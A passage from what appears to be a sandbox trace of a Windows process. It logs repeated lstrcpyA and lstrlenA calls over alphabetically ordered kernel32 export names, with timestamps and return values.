(lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.230] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.230] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.230] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.230] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.230] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.231] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.231] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.231] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.231] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.231] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.231] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.231] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.231] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.231] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.231] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.231] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.231] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.231] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.231] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.231] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.231] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.231] lstrlenA (lpString="BEEP") returned 4 [0084.231] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.231] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.231] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.231] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.231] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.231] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.231] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.231] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.231] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.231] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.231] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.231] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.231] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.231] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.231] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.231] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.231] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.231] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.231] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.231] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.232] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.232] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.232] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.232] lstrlenA (lpString="CANCELIO") returned 8 [0084.232] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.232] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.232] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.232] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.232] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.232] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.232] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.232] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.232] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.232] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.232] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.232] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.232] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.232] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.232] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.232] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.232] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.232] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.232] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.232] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.232] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.232] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.232] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.232] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.232] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.232] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.232] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.232] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.232] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.232] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.232] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.232] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.233] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.233] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.233] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.233] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.233] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.233] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.233] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.233] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.233] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.233] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.233] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.233] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.233] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.233] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.233] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.233] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.233] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.233] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.233] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.233] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.233] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.233] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.233] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.233] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.233] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.233] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.233] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.233] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.233] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.233] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.233] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.233] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.233] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.233] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.233] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.233] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.233] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.234] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.234] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.234] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.234] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.234] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.234] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.234] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.234] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.234] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.234] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.234] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.234] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.234] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.234] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.234] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.234] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.234] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.234] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.234] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.234] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.234] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.234] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.234] lstrlenA (lpString="COPYFILEA") returned 9 [0084.234] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.234] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.234] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.234] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.234] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.234] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.234] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.234] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.234] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.234] lstrlenA (lpString="COPYFILEW") returned 9 [0084.234] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.234] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.234] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.234] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.235] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.235] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.235] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.235] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.235] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.235] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.235] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.235] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.235] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.235] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.235] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.235] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.235] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.235] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.235] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.235] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.235] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.235] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.236] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.236] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.236] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.236] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.236] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.236] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.236] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.236] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.236] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.236] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.236] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.236] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.237] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.237] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.237] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.237] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.237] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.237] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.237] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.237] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.237] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.237] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.237] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.237] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.237] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.237] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.237] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.237] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.238] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.238] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.238] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.238] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.238] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.238] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.238] lstrcpyA 